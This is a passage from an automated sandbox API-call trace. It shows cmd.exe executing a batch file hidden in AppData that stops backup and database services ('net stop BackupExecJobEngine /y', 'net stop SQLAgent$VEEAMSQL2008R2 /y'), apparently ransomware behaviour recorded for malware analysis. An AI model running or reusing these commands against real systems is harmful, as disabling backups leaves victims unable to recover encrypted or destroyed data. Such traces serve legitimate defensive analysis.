dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xfba [0206.094] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x907, lpOverlapped=0x0) returned 1 [0206.094] SetFilePointer (in: hFile=0x78, lDistanceToMove=4059, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfdb [0206.094] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=33, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop BackupExecJobEngine /y\r\n\r\n\r\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 33 [0206.095] _get_osfhandle (_FileHandle=3) returned 0x78 [0206.095] GetFileType (hFile=0x78) returned 0x1 [0206.095] _get_osfhandle (_FileHandle=3) returned 0x78 [0206.095] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xfdb [0206.095] GetProcessHeap () returned 0x3e0000 [0206.095] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0206.095] GetProcessHeap () returned 0x3e0000 [0206.095] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0206.098] _tell (_FileHandle=3) returned 4059 [0206.098] _close (_FileHandle=3) returned 0 [0206.098] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0206.098] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0206.098] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0206.098] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0206.098] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0206.098] _wcsicmp (_String1="net", _String2="CD") returned 11 [0206.098] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0206.098] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0206.098] _wcsicmp (_String1="net", _String2="REN") returned -4 [0206.098] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0206.098] _wcsicmp (_String1="net", _String2="SET") returned -5 [0206.098] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0206.098] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0206.098] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0206.098] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0206.098] _wcsicmp (_String1="net", _String2="MD") returned 1 [0206.098] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0206.098] _wcsicmp (_String1="net", _String2="RD") returned -4 [0206.098] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0206.098] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0206.099] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0206.099] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0206.099] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0206.099] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0206.099] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0206.099] _wcsicmp (_String1="net", _String2="VER") returned -8 [0206.099] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0206.099] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0206.099] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0206.099] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0206.099] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0206.099] _wcsicmp (_String1="net", _String2="START") returned -5 [0206.099] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0206.099] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0206.099] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0206.099] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0206.099] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0206.099] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0206.099] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0206.099] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0206.099] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0206.099] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0206.099] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0206.099] SetErrorMode (uMode=0x0) returned 0x1 [0206.100] GetProcessHeap () returned 0x3e0000 [0206.100] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0206.100] GetProcessHeap () returned 0x3e0000 [0206.100] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0206.100] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.100] GetProcessHeap () returned 0x3e0000 [0206.100] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0206.100] GetProcessHeap () returned 0x3e0000 [0206.100] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0206.100] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0206.100] GetProcessHeap () returned 0x3e0000 [0206.100] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0206.100] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.101] GetProcessHeap () returned 0x3e0000 [0206.101] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0206.101] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0206.101] GetProcessHeap () returned 0x3e0000 [0206.101] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0206.101] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.102] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0206.102] GetLastError () returned 0x2 [0206.102] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0206.102] GetLastError () returned 0x2 [0206.103] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0206.103] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0206.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0206.104] GetLastError () returned 0x2 [0206.104] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0206.104] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0206.104] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.105] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0206.105] SetErrorMode (uMode=0x0) returned 0x1 [0206.105] GetProcessHeap () returned 0x3e0000 [0206.105] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0206.105] GetProcessHeap () returned 0x3e0000 [0206.105] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0206.105] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.105] GetProcessHeap () returned 0x3e0000 [0206.105] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0206.105] GetProcessHeap () returned 0x3e0000 [0206.106] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0206.106] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0206.106] GetProcessHeap () returned 0x3e0000 [0206.106] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0206.106] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.106] GetProcessHeap () returned 0x3e0000 [0206.106] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0206.106] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0206.106] GetProcessHeap () returned 0x3e0000 [0206.106] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0206.107] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.110] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0206.110] GetLastError () returned 0x2 [0206.110] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0206.110] GetLastError () returned 0x2 [0206.111] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.111] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0206.111] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0206.112] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0206.112] GetLastError () returned 0x2 [0206.112] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0206.112] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0206.113] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.113] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0206.113] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0206.113] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0206.113] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0206.113] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop BackupExecJobEngine /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop BackupExecJobEngine /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop BackupExecJobEngine /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x2c8, dwThreadId=0x814)) returned 1 [0206.117] CloseHandle (hObject=0x78) returned 1 [0206.117] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0206.117] GetProcessHeap () returned 0x3e0000 [0206.118] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0206.118] GetEnvironmentStringsW () returned 0x3f8408* [0206.118] GetProcessHeap () returned 0x3e0000 [0206.118] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0206.118] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0206.118] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0206.256] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0206.256] CloseHandle (hObject=0x74) returned 1 [0206.256] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0206.256] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0206.256] GetProcessHeap () returned 0x3e0000 [0206.256] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0206.256] GetEnvironmentStringsW () returned 0x3f8408* [0206.256] GetProcessHeap () returned 0x3e0000 [0206.256] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0206.257] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0206.257] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0206.257] GetProcessHeap () returned 0x3e0000 [0206.257] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0206.257] GetEnvironmentStringsW () returned 0x3f8408* [0206.257] GetProcessHeap () returned 0x3e0000 [0206.257] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0206.257] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0206.257] GetProcessHeap () returned 0x3e0000 [0206.257] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0206.257] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0206.257] _get_osfhandle (_FileHandle=1) returned 0x264 [0206.257] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0206.257] _get_osfhandle (_FileHandle=1) returned 0x264 [0206.257] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0206.257] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0206.257] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0206.258] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0206.258] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0206.258] SetConsoleInputExeNameW () returned 0x1 [0206.258] GetConsoleOutputCP () returned 0x1b5 [0206.258] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0206.258] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.258] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0206.259] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0206.259] _get_osfhandle (_FileHandle=3) returned 0x74 [0206.259] SetFilePointer (in: hFile=0x74, lDistanceToMove=4059, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfdb [0206.259] GetProcessHeap () returned 0x3e0000 [0206.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0206.259] GetProcessHeap () returned 0x3e0000 [0206.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0206.259] GetProcessHeap () returned 0x3e0000 [0206.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0206.259] GetProcessHeap () returned 0x3e0000 [0206.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0206.259] GetProcessHeap () returned 0x3e0000 [0206.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0206.259] GetProcessHeap () returned 0x3e0000 [0206.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0206.259] GetProcessHeap () returned 0x3e0000 [0206.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0206.259] GetProcessHeap () returned 0x3e0000 [0206.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0206.259] GetProcessHeap () returned 0x3e0000 [0206.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0206.259] GetProcessHeap () returned 0x3e0000 [0206.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0206.259] GetProcessHeap () returned 0x3e0000 [0206.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0206.259] GetProcessHeap () returned 0x3e0000 [0206.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0206.259] GetProcessHeap () returned 0x3e0000 [0206.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0206.259] _get_osfhandle (_FileHandle=3) returned 0x74 [0206.260] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xfdb [0206.260] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x8e6, lpOverlapped=0x0) returned 1 [0206.260] SetFilePointer (in: hFile=0x74, lDistanceToMove=4096, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1000 [0206.260] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=37, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$VEEAMSQL2008R2 /y\r\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 37 [0206.260] _get_osfhandle (_FileHandle=3) returned 0x74 [0206.260] GetFileType (hFile=0x74) returned 0x1 [0206.260] _get_osfhandle (_FileHandle=3) returned 0x74 [0206.260] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1000 [0206.260] GetProcessHeap () returned 0x3e0000 [0206.260] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0206.260] GetProcessHeap () returned 0x3e0000 [0206.260] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0206.263] _tell (_FileHandle=3) returned 4096 [0206.264] _close (_FileHandle=3) returned 0 [0206.264] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0206.264] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0206.264] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0206.264] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0206.264] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0206.264] _wcsicmp (_String1="net", _String2="CD") returned 11 [0206.264] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0206.264] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0206.264] _wcsicmp (_String1="net", _String2="REN") returned -4 [0206.264] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0206.264] _wcsicmp (_String1="net", _String2="SET") returned -5 [0206.264] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0206.264] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0206.264] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0206.264] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0206.264] _wcsicmp (_String1="net", _String2="MD") returned 1 [0206.264] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0206.264] _wcsicmp (_String1="net", _String2="RD") returned -4 [0206.264] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0206.264] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0206.264] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0206.264] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0206.264] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0206.264] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0206.264] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0206.264] _wcsicmp (_String1="net", _String2="VER") returned -8 [0206.264] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0206.264] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0206.264] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0206.264] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0206.264] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0206.264] _wcsicmp (_String1="net", _String2="START") returned -5 [0206.264] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0206.264] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0206.265] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0206.265] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0206.265] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0206.265] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0206.265] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0206.265] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0206.265] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0206.265] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0206.265] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0206.265] SetErrorMode (uMode=0x0) returned 0x1 [0206.265] GetProcessHeap () returned 0x3e0000 [0206.265] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0206.265] GetProcessHeap () returned 0x3e0000 [0206.265] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0206.266] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.266] GetProcessHeap () returned 0x3e0000 [0206.266] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0206.266] GetProcessHeap () returned 0x3e0000 [0206.266] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0206.266] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0206.266] GetProcessHeap () returned 0x3e0000 [0206.266] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0206.266] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.266] GetProcessHeap () returned 0x3e0000 [0206.266] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0206.267] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0206.267] GetProcessHeap () returned 0x3e0000 [0206.267] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0206.267] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.267] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0206.268] GetLastError () returned 0x2 [0206.268] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0206.268] GetLastError () returned 0x2 [0206.268] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.269] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0206.269] 